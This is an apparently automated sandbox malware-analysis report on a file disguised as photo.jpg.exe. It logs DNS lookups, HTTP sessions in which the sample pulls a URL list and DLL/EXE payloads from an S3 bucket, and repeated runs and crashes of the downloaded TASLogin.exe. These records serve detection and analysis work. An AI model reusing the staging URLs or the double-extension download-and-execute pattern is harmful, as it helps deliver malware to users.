                                      Apr 2, 2025 16:22:40.288744926 CEST | 1.1.1.1 | 192.168.2.9 | 0x9b6d | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.150.100 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:40.288744926 CEST | 1.1.1.1 | 192.168.2.9 | 0x9b6d | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.132.219 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:40.288744926 CEST | 1.1.1.1 | 192.168.2.9 | 0x9b6d | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.149.157 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:40.288744926 CEST | 1.1.1.1 | 192.168.2.9 | 0x9b6d | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.184.26 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:40.288744926 CEST | 1.1.1.1 | 192.168.2.9 | 0x9b6d | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.132.199 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:40.288744926 CEST | 1.1.1.1 | 192.168.2.9 | 0x9b6d | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.40.71 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:40.288744926 CEST | 1.1.1.1 | 192.168.2.9 | 0x9b6d | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.148.197 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:58.007942915 CEST | 1.1.1.1 | 192.168.2.9 | 0xe627 | No error (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | s3-r-w.ap-southeast-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:58.007942915 CEST | 1.1.1.1 | 192.168.2.9 | 0xe627 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.146.183 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:58.007942915 CEST | 1.1.1.1 | 192.168.2.9 | 0xe627 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.150.142 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:58.007942915 CEST | 1.1.1.1 | 192.168.2.9 | 0xe627 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.150.157 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:58.007942915 CEST | 1.1.1.1 | 192.168.2.9 | 0xe627 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.132.31 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:58.007942915 CEST | 1.1.1.1 | 192.168.2.9 | 0xe627 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.148.142 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:58.007942915 CEST | 1.1.1.1 | 192.168.2.9 | 0xe627 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.149.130 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:58.007942915 CEST | 1.1.1.1 | 192.168.2.9 | 0xe627 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.125.35 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:22:58.007942915 CEST | 1.1.1.1 | 192.168.2.9 | 0xe627 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.150.253 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:02.511467934 CEST | 1.1.1.1 | 192.168.2.9 | 0xc509 | No error (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | s3-r-w.ap-southeast-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:02.511467934 CEST | 1.1.1.1 | 192.168.2.9 | 0xc509 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.124.23 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:02.511467934 CEST | 1.1.1.1 | 192.168.2.9 | 0xc509 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.147.175 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:02.511467934 CEST | 1.1.1.1 | 192.168.2.9 | 0xc509 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.164.106 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:02.511467934 CEST | 1.1.1.1 | 192.168.2.9 | 0xc509 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.150.166 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:02.511467934 CEST | 1.1.1.1 | 192.168.2.9 | 0xc509 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.150.126 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:02.511467934 CEST | 1.1.1.1 | 192.168.2.9 | 0xc509 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.128.99 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:02.511467934 CEST | 1.1.1.1 | 192.168.2.9 | 0xc509 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.164.23 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:02.511467934 CEST | 1.1.1.1 | 192.168.2.9 | 0xc509 | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.146.146 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:07.223876953 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c0b | No error (0) | imagesyd.s3.ap-southeast-1.amazonaws.com | s3-r-w.ap-southeast-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:07.223876953 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c0b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.132.99 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:07.223876953 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c0b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.164.114 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:07.223876953 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c0b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.132.199 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:07.223876953 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c0b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.133.11 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:07.223876953 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c0b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.129.90 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:07.223876953 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c0b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.146.189 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:07.223876953 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c0b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 52.219.133.51 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:07.223876953 CEST | 1.1.1.1 | 192.168.2.9 | 0x2c0b | No error (0) | s3-r-w.ap-southeast-1.amazonaws.com | | 3.5.146.138 | A (IP address) | IN (0x0001) | false
                                      Apr 2, 2025 16:23:11.994951963 CEST | 1.1.1.1 | 192.168.2.9 | 0x9b65 | No error (0) | u.arpuu.com | | 13.208.251.115 | A (IP address) | IN (0x0001) | false
                                      • imagesyd.s3.ap-southeast-1.amazonaws.com
                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      0 | 192.168.2.9 | 49684 | 3.5.150.219 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:22:29 UTC | 96 | OUT | GET /uu.txt HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      Connection: Keep-Alive
                                      2025-04-02 14:22:30 UTC | 446 | IN | HTTP/1.1 200 OK
                                      x-amz-id-2: oS8kRhny6n9ahPnAfpLEa+SQsCwPgfOEi46Bxkw2lZ9DQlDeUwty1EAi4xIh2ciPYmKVKciW6SzV6Fz3gY99+30BTGWNDOxl5mzLRK3z6SA=
                                      x-amz-request-id: ZCJWE5YAJ9XD3R47
                                      Date: Wed, 02 Apr 2025 14:22:31 GMT
                                      Last-Modified: Sat, 15 Mar 2025 15:31:00 GMT
                                      ETag: "58c8e33173c57c0402210b9254bd365e"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: text/plain
                                      Content-Length: 381
                                      Server: AmazonS3
                                      Connection: close
                                      2025-04-02 14:22:30 UTC | 381 | IN | Data Ascii:
                                      https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLoginBase.dll
                                      https://imagesyd.s3.ap-southeast-1.amazonaws.com/commonbase.dll
                                      https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.edskv
                                      https://imagesyd.s3.ap-southeast-1.amazonaws.com/TASLogin.


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      1 | 192.168.2.9 | 49685 | 3.5.150.219 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:22:31 UTC | 83 | OUT | HEAD /TASLoginBase.dll HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:31 UTC | 457 | IN | HTTP/1.1 200 OK
                                      x-amz-id-2: qvGD3I22prr7zJEREuNygAwnVSAw4gWUex0e879I4KGhzVZr3HoDHaIlIukyATJtbB9ey7LEh9j/Tdke8S59/oGgBtR/CyQ6Hxpsxwd2cC0=
                                      x-amz-request-id: 4404QTRS5VH04SA7
                                      Date: Wed, 02 Apr 2025 14:22:32 GMT
                                      Last-Modified: Wed, 02 Apr 2025 09:46:04 GMT
                                      ETag: "627b8bb2190258a6c4ec5d7049cff9d8"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: binary/octet-stream
                                      Content-Length: 13472
                                      Server: AmazonS3
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      2 | 192.168.2.9 | 49686 | 3.5.150.219 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:22:32 UTC | 99 | OUT | GET /TASLoginBase.dll HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:33 UTC | 506 | IN | HTTP/1.1 206 Partial Content
                                      x-amz-id-2: Ik+OvaxcaHL8/68lMz4bD1tcERQYsA08XFvau89roDeGqCyCISFVjICeiH2d241xZUqRhY39Rhn1JyZVrDbk0qvWpLOgQmAUe3G3bd+FdaY=
                                      x-amz-request-id: CJ3Z4EXEA45DSZ4V
                                      Date: Wed, 02 Apr 2025 14:22:34 GMT
                                      Last-Modified: Wed, 02 Apr 2025 09:46:04 GMT
                                      ETag: "627b8bb2190258a6c4ec5d7049cff9d8"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-13471/13472
                                      Content-Type: binary/octet-stream
                                      Content-Length: 13472
                                      Server: AmazonS3
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      3 | 192.168.2.9 | 49687 | 52.219.129.35 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:22:34 UTC | 81 | OUT | HEAD /commonbase.dll HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:35 UTC | 427 | IN | HTTP/1.1 200 OK
                                      x-amz-id-2: /wxqSx/J4PUHLmeqP00IDOa+f+cQYxxGAmKW+g+iwj8i/kgHPZpsD7wRjHK/lpc24MFSvNO+Vpc=
                                      x-amz-request-id: X04R6DPTN8C3YBFE
                                      Date: Wed, 02 Apr 2025 14:22:36 GMT
                                      Last-Modified: Mon, 31 Mar 2025 08:25:41 GMT
                                      ETag: "fe96dd18c9789c78a6011b6f9821d205"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: binary/octet-stream
                                      Content-Length: 2399904
                                      Server: AmazonS3
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      4 | 192.168.2.9 | 49688 | 52.219.129.35 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:22:36 UTC | 97 | OUT | GET /commonbase.dll HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:36 UTC | 480 | IN | HTTP/1.1 206 Partial Content
                                      x-amz-id-2: cuO7iOD0Ov5XxIjzsUHu2S1ZqMGHjIRYkGsMHImr86OKxUsr4JXvk36X+M6cZvRfrQYOE1ManH0=
                                      x-amz-request-id: BDKY9671HB8QKND9
                                      Date: Wed, 02 Apr 2025 14:22:37 GMT
                                      Last-Modified: Mon, 31 Mar 2025 08:25:41 GMT
                                      ETag: "fe96dd18c9789c78a6011b6f9821d205"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-2399903/2399904
                                      Content-Type: binary/octet-stream
                                      Content-Length: 2399904
                                      Server: AmazonS3
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      5 | 192.168.2.9 | 49689 | 3.5.150.100 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:22:40 UTC | 81 | OUT | HEAD /TASLogin.edskv HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:41 UTC | 459 | IN | HTTP/1.1 200 OK
                                      x-amz-id-2: Gc/qpy18FG+0iqIC0uTbo6i/IXSBvQmcCKhoiCJENq67umxErJtAN1h1zNFZdTVgkh87rMc8XQcKaI3cpllugWvpJJs9hl5sh9rPYa/p63Y=
                                      x-amz-request-id: 5A8S7M8Z8SKAM11P
                                      Date: Wed, 02 Apr 2025 14:22:42 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:35:11 GMT
                                      ETag: "44f432c76ebf0b7ba26f37ce9cc70aea"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: binary/octet-stream
                                      Content-Length: 2874368
                                      Server: AmazonS3
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      6 | 192.168.2.9 | 49691 | 3.5.150.100 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:22:42 UTC | 97 | OUT | GET /TASLogin.edskv HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:43 UTC512INHTTP/1.1 206 Partial Content
                                      x-amz-id-2: V3XhLWk7hSrS7vXOrZx6tQWpCfusRRKh8OH3fxDBPzUrpqHzP9DntaVtcsd2O5yduOa6NnC0mrKwwkvsC0Mo5Dz9dZ72EI/uTfQK8Hnp2/A=
                                      x-amz-request-id: MMJZBPDBK0ADPNQ5
                                      Date: Wed, 02 Apr 2025 14:22:43 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:35:11 GMT
                                      ETag: "44f432c76ebf0b7ba26f37ce9cc70aea"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-2874367/2874368
                                      Content-Type: binary/octet-stream
                                      Content-Length: 2874368
                                      Server: AmazonS3
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      7 | 192.168.2.9 | 49698 | 3.5.146.183 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:22:58 UTC | 79 | OUT | HEAD /TASLogin.txt HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:22:59 UTC | 445 | IN | HTTP/1.1 200 OK
                                      x-amz-id-2: gKTayPp1KIkWiws78qVEtOWsXT17rp4//DtlOZd/aDIs3BzMNtYyX9TbHoJ0bIXfQz3Go1yB4AIMm4sQumi91gl9MQdrjh3r4gZgO3HvxpI=
                                      x-amz-request-id: 5VVAQ84AF610F90E
                                      Date: Wed, 02 Apr 2025 14:23:00 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:35:12 GMT
                                      ETag: "d476ff5557309a1349660fab8efc4179"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Server: AmazonS3
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      8 | 192.168.2.9 | 49701 | 3.5.146.183 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:23:00 UTC | 95 | OUT | GET /TASLogin.txt HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:23:00 UTC | 488 | IN | HTTP/1.1 206 Partial Content
                                      x-amz-id-2: R3Eqm8lVa8PcCRvQCjf+7ahBcgt9FNs2VrW7VguYUlgQJ784jWLUG1FIacJi3GPqlKHtLc7FpuDob9mtmBgXF/HorvDL3KAY/cx38ni0o+s=
                                      x-amz-request-id: JVFJGSH9ZXB768J2
                                      Date: Wed, 02 Apr 2025 14:23:01 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:35:12 GMT
                                      ETag: "d476ff5557309a1349660fab8efc4179"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-10/11
                                      Content-Type: text/plain
                                      Content-Length: 11
                                      Server: AmazonS3
                                      Connection: close
                                      2025-04-02 14:23:00 UTC | 11 | IN | Data Raw: 35 39 33 2e 33 31 31 35 2e 35 36
                                      Data Ascii: 593.3115.56


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      9 | 192.168.2.9 | 49702 | 3.5.146.183 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:23:01 UTC | 76 | OUT | HEAD /image.jpg HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:23:02 UTC | 447 | IN | HTTP/1.1 200 OK
                                      x-amz-id-2: fPh+LTV1HHNL2bGYGi4/Za0GGM49i0z47vSHoXGp3s5SlUEQA5+esE0eX9P4S/EcGImOfiIVGYtLxwmEMYYBLTyJqo96bULUO3hoCIsRkiI=
                                      x-amz-request-id: PD1Q1S2JKFQF96FC
                                      Date: Wed, 02 Apr 2025 14:23:03 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:39:16 GMT
                                      ETag: "23e20aec94c80e49b5ea7893443e397e"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: image/jpeg
                                      Content-Length: 6420
                                      Server: AmazonS3
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      10 | 192.168.2.9 | 49704 | 52.219.124.23 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:23:03 UTC | 92 | OUT | GET /image.jpg HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:23:03 UTC | 462 | IN | HTTP/1.1 206 Partial Content
                                      x-amz-id-2: 1+uB8srAbbdpRoPObVAC0xVbsz68BczojDfHIB5xhpYXUsoJX4gI2vF6Ks8PlryBl5e/SiDawAI=
                                      x-amz-request-id: KBYY81C0RR69JD28
                                      Date: Wed, 02 Apr 2025 14:23:04 GMT
                                      Last-Modified: Sat, 15 Mar 2025 14:39:16 GMT
                                      ETag: "23e20aec94c80e49b5ea7893443e397e"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-6419/6420
                                      Content-Type: image/jpeg
                                      Content-Length: 6420
                                      Server: AmazonS3
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      11 | 192.168.2.9 | 49707 | 52.219.124.23 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:23:06 UTC | 79 | OUT | HEAD /TASLogin.exe HTTP/1.1
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:23:07 UTC | 431 | IN | HTTP/1.1 200 OK
                                      x-amz-id-2: X7R4MniF/gdoLx3aaMAwtIZJ4hxQk8FI3H0iIlWtaw6EB1E5z8N63KSkKIGhnkWQTGwZY4WPDiE=
                                      x-amz-request-id: ANXQBG30YBZA5Q7S
                                      Date: Wed, 02 Apr 2025 14:23:07 GMT
                                      Last-Modified: Sat, 15 Mar 2025 15:30:24 GMT
                                      ETag: "7ca41e122724c2d808bf73b7a5129365"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Type: application/octet-stream
                                      Content-Length: 995560
                                      Server: AmazonS3
                                      Connection: close


                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                      12 | 192.168.2.9 | 49708 | 52.219.132.99 | 443 | 7144 | C:\Users\user\Desktop\photo.jpg.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2025-04-02 14:23:07 UTC | 95 | OUT | GET /TASLogin.exe HTTP/1.1
                                      Range: bytes=0-
                                      Host: imagesyd.s3.ap-southeast-1.amazonaws.com
                                      2025-04-02 14:23:08 UTC | 482 | IN | HTTP/1.1 206 Partial Content
                                      x-amz-id-2: iJBV9+EP/OU7UKU8HX8JuZFYaSCthaDu0mSQSj5UOzTE+l6D9ivVyqC/XuIl3U54TKGcRw0D+6I=
                                      x-amz-request-id: DWQ9K3ZHA1TQ91DP
                                      Date: Wed, 02 Apr 2025 14:23:09 GMT
                                      Last-Modified: Sat, 15 Mar 2025 15:30:24 GMT
                                      ETag: "7ca41e122724c2d808bf73b7a5129365"
                                      x-amz-server-side-encryption: AES256
                                      Accept-Ranges: bytes
                                      Content-Range: bytes 0-995559/995560
                                      Content-Type: application/octet-stream
                                      Content-Length: 995560
                                      Server: AmazonS3
                                      Connection: close


                                      Target ID:0
                                      Start time:10:22:27
                                      Start date:02/04/2025
                                      Path:C:\Users\user\Desktop\photo.jpg.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\photo.jpg.exe"
                                      Imagebase:0x240000
                                      File size:289'438 bytes
                                      MD5 hash:A5FB35B15C22B46A62905BF7A9F492BF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:14
                                      Start time:10:23:09
                                      Start date:02/04/2025
                                      Path:C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
                                      Imagebase:0x400000
                                      File size:995'560 bytes
                                      MD5 hash:7CA41E122724C2D808BF73B7A5129365
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:Borland Delphi
                                      Antivirus matches:
                                      • Detection: 3%, ReversingLabs
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:17
                                      Start time:10:23:11
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1600
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:19
                                      Start time:10:23:12
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7304 -s 1656
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:20
                                      Start time:10:23:20
                                      Start date:02/04/2025
                                      Path:C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
                                      Imagebase:0x400000
                                      File size:995'560 bytes
                                      MD5 hash:7CA41E122724C2D808BF73B7A5129365
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:Borland Delphi
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:22
                                      Start time:10:23:22
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1376
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:24
                                      Start time:10:23:23
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7528 -s 1384
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:25
                                      Start time:10:23:28
                                      Start date:02/04/2025
                                      Path:C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\be24a5a2-f663-4e93-be62-2dc99eb7c31e042\TASLogin.exe"
                                      Imagebase:0x400000
                                      File size:995'560 bytes
                                      MD5 hash:7CA41E122724C2D808BF73B7A5129365
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:Borland Delphi
                                      Reputation:moderate
                                      Has exited:true

                                      Target ID:27
                                      Start time:10:23:30
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1460
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:29
                                      Start time:10:23:31
                                      Start date:02/04/2025
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7700 -s 1468
                                      Imagebase:0xcc0000
                                      File size:483'680 bytes
                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                      Has elevated privileges:false
                                      Has administrator privileges:false
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      No disassembly